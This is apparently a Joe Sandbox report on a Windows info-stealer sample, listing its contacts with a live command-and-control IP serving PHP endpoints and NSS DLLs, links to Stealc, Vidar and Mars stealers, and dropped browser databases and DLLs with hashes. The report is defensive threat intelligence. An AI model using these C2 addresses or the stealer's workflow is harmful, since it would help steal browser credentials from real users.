https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, DGCBKECAKFBGCAKECGIE.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	GCGDGHCB.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://40.86.87.10/108e010e8f91c38c.phposition:	i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://40.86.87.10/108e010e8f91c38c.phpe	i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://40.86.87.10/108e010e8f91c38c.phpirefox	i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://40.86.87.10/b13597c85f807692/nss3.dllll	i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://40.86.87.10/108e010e8f91c38c.	i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://40.86.87.10/b13597c85f807692/nss3.dllllU	i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	GCGDGHCB.0.dr	false	Avira URL Cloud: safe	unknown
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, DGCBKECAKFBGCAKECGIE.0.dr	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmp, i3NmF0obCm.exe, 00000000.00000003.1724627062.000000002185D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://40.86.87.10/108e010e8f91c38c.php976cbc684762e42ee25308426ba0ad93	i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: malware	unknown
http://40.86.87.10/108e010e8f91c38c.phpv	i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.ecosia.org/newtab/	i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013D0000.00000004.00000020.00020000.00000000.sdmp, GCGDGHCB.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr	false	URL Reputation: safe	unknown
https://cdn.ep	i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013D0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	GCGDGHCB.0.dr	false	URL Reputation: safe	unknown
http://40.86.87.10/108e010e8f91c38c.phpI	i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, DGCBKECAKFBGCAKECGIE.0.dr	false	Avira URL Cloud: safe	unknown
http://40.86.87.10/b13597c85f807692/nss3.dllQ	i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://40.86.87.10/108e010e8f91c38c.php-LTC	i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org	GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	GCGDGHCB.0.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
40.86.87.10	unknown	United States		8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1465851
Start date and time:	2024-07-02 07:30:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	i3NmF0obCm.exe renamed because original name is a hash value
Original Sample Name:	253ccac8a47b80287f651987c0c779ea.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/22@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 76 Number of non-executed functions: 228
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
40.86.87.10	setup.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, SmokeLoader, Stealc	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	mirai.m68k.elf	Get hash	malicious	Mirai	Browse	104.209.250.60
	mirai.mips.elf	Get hash	malicious	Mirai	Browse	20.159.167.175
	Build.exe	Get hash	malicious	DBatLoader, Neshta	Browse	13.107.246.60
	mirai.mpsl.elf	Get hash	malicious	Mirai	Browse	20.29.110.124
	F.exe	Get hash	malicious	AsyncRAT, Neshta, XWorm	Browse	13.107.246.60
	mirai.spc.elf	Get hash	malicious	Mirai	Browse	20.214.3.230
	mirai.x86.elf	Get hash	malicious	Mirai	Browse	13.71.123.37
	https://scanner.topsec.com/?d=3744&r=auto&u=https%3A%2F%2Fmaknastudio.com%2Fpkyos&t=a4fe2e96fe6815a71cc8a7f1ae1196e6fbcf1f08	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	https://app.smartsheet.com/b/download/att/1/4551989320961924/a9qsrcukwyvga6dsz82rixnmpg	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	[EXTERNAL] Action Required_ ACH Remittance Review Abrholdings	Get hash	malicious	Unknown	Browse	13.107.246.60

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	Wf9qnVcbi8.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	setup.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, SmokeLoader, Stealc	Browse
	1719859269.0326595_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig	Browse
	jlO7971vUz.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	Rnteb46TuM.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	1jPL5zru3u.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	Zachv5lCuu.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	1719520929.094843_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, Vidar	Browse
	j7iUba2bki.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	9444f34a94d494a78e19e19f4e1615744e500aca97a56.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
C:\ProgramData\mozglue.dll	Wf9qnVcbi8.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	setup.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, SmokeLoader, Stealc	Browse
	1719859269.0326595_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig	Browse
	jlO7971vUz.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	Rnteb46TuM.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	1jPL5zru3u.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	Zachv5lCuu.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	1719520929.094843_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, Vidar	Browse
	j7iUba2bki.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	9444f34a94d494a78e19e19f4e1615744e500aca97a56.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\AEBKFIJEGCAAFHJKFCFCAAAAEG

Download File

Process:	C:\Users\user\Desktop\i3NmF0obCm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AKFHDBFIDAECAAAKEGDA

Download File

Process:	C:\Users\user\Desktop\i3NmF0obCm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DGCBKECAKFBGCAKECGIE

Download File

Process:	C:\Users\user\Desktop\i3NmF0obCm.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\EGCGHCBK

Download File

Process:	C:\Users\user\Desktop\i3NmF0obCm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GCGDGHCB

Download File

Process:	C:\Users\user\Desktop\i3NmF0obCm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GDGDHJJDGHCAAAKEHIJKEBAEGH

Download File

Process:	C:\Users\user\Desktop\i3NmF0obCm.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GDHCGDGIEBKJKFHJJKFCBFBGDA

Download File

Process:	C:\Users\user\Desktop\i3NmF0obCm.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JJKJDAEBFCBKECBGDBFC

Download File

Process:	C:\Users\user\Desktop\i3NmF0obCm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\i3NmF0obCm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Wf9qnVcbi8.exe, Detection: malicious, Browse Filename: setup.exe, Detection: malicious, Browse Filename: 1719859269.0326595_setup.exe, Detection: malicious, Browse Filename: jlO7971vUz.exe, Detection: malicious, Browse Filename: Rnteb46TuM.exe, Detection: malicious, Browse Filename: 1jPL5zru3u.exe, Detection: malicious, Browse Filename: Zachv5lCuu.exe, Detection: malicious, Browse Filename: 1719520929.094843_setup.exe, Detection: malicious, Browse Filename: j7iUba2bki.exe, Detection: malicious, Browse Filename: 9444f34a94d494a78e19e19f4e1615744e500aca97a56.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\i3NmF0obCm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Wf9qnVcbi8.exe, Detection: malicious, Browse Filename: setup.exe, Detection: malicious, Browse Filename: 1719859269.0326595_setup.exe, Detection: malicious, Browse Filename: jlO7971vUz.exe, Detection: malicious, Browse Filename: Rnteb46TuM.exe, Detection: malicious, Browse Filename: 1jPL5zru3u.exe, Detection: malicious, Browse Filename: Zachv5lCuu.exe, Detection: malicious, Browse Filename: 1719520929.094843_setup.exe, Detection: malicious, Browse Filename: j7iUba2bki.exe, Detection: malicious, Browse Filename: 9444f34a94d494a78e19e19f4e1615744e500aca97a56.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\i3NmF0obCm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\i3NmF0obCm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\i3NmF0obCm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\i3NmF0obCm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll

Download File

